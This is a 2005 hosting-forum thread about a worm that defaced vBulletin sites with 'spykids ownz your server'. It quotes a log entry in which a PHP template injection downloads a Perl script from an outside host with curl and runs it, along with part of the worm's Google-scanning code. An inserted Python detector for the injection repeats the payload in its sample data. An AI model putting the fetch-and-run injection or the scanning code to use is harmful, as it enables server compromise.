The Community Forums


spykids ownz your server

Discussion in 'General Discussion' started by asmithjr, Mar 6, 2005.

  1. asmithjr

    asmithjr Well-Known Member

  2. internetfab

    internetfab Well-Known Member
    PartnerNOC

  3. asmithjr

    asmithjr Well-Known Member

    Yep, I see it on most links to the site.

    I find nothing on the net. What to do to prevent this on our servers?
     
  4. StevenC

    StevenC Well-Known Member

    They seem to be hitting a lot of sites; my guess is vulnerable PHP scripts.
     
  5. ashd

    ashd Member

    It's not people, it's a trojan: Troj/Sown-A.
    Troj/Sown-A overwrites all files named index.* under the /home directory with the following text:
    spykids ownz your server.
     
  6. junglecat

    junglecat Well-Known Member

    My n00b-iness is showing, but how does the trojan get on the server?
     
  7. chae

    chae Well-Known Member

    mod_security logs show our server being hit...

    213.202.245.143 2005-03-06 22:53:17 (null) /forums/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://xxxxxxxxxxx.com/spykids.txt%20;perl%20spykids.txt etc etc etc

    By the looks of the code it was looking for a vBulletin forum on the server:

    ############### google
    for($n=0;$n<1000;$n += 100){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
    print $sock "Host: www.google.com";
     
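    The mod_security entry chae quoted above is the worm's delivery vector: a PHP `{${system(...)}}` expression smuggled into vBulletin's `template` parameter. As an added example that is not part of this thread, the following detector (helper names are my own, and the sample log lines are constructed in the same shape as the quoted entry) flags such requests in a log and lists `index.*` files that carry the defacement string ashd described.

```python
# Added example, not code from the thread: flag the template-injection request
# seen in the mod_security log and find index.* files overwritten by the worm.
import re
from pathlib import Path
from urllib.parse import unquote

# Constructed sample lines mirroring the "ip date time (null) request" layout above.
# The host name and IPs are placeholders, not the ones from the original log.
SAMPLE_LOG = """\
203.0.113.7 2005-03-06 22:53:17 (null) /forums/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://example.invalid/spykids.txt%20;perl%20spykids.txt%22)}}
198.51.100.9 2005-03-06 22:54:02 (null) /forums/misc.php?do=page&template=faq
192.0.2.5 2005-03-06 22:55:10 (null) /index.php?page=home
"""

# PHP "complex syntax" evaluation, {${ func( ... ) }}, injected into a template name.
INJECTION = re.compile(r"\{\$\{\s*(\w+)\s*\((.*)\)\s*\}\}", re.S)

def find_template_injections(log_text):
    """Return (client_ip, php_function, decoded_argument) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 4)          # ip, date, time, "(null)", request
        if len(parts) < 5:
            continue
        ip, request = parts[0], parts[4]
        match = INJECTION.search(unquote(request))   # decode %22, %20 before matching
        if match:
            hits.append((ip, match.group(1), match.group(2).strip('"')))
    return hits

# Text Troj/Sown-A writes into every index.* file it overwrites.
DEFACEMENT = "spykids ownz your server"

def find_defaced_index_files(root):
    """Return sorted paths of index.* files under root containing the defacement marker."""
    return sorted(
        str(p) for p in Path(root).rglob("index.*")
        if p.is_file() and DEFACEMENT in p.read_text(errors="replace")
    )
```

Running `find_defaced_index_files("/home")` on a cPanel box gives the list of accounts whose index pages need restoring from backup; the log scanner tells you which client addresses delivered the payload.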
  8. DigitalN

    DigitalN Well-Known Member

    The wonderful propagating Perl script worms attacking vulnerable PHP scripts - sigh :(

    Better be quick with the next kernel upgrades when the next serious vulnerability is found, or there will be a lot of hacked servers I feel.
     
  9. djmerlyn

    djmerlyn Well-Known Member

    All your base are belong to us!

    :Sorry, just had to! LOL!:
    :D
     
  10. brentp

    brentp Well-Known Member

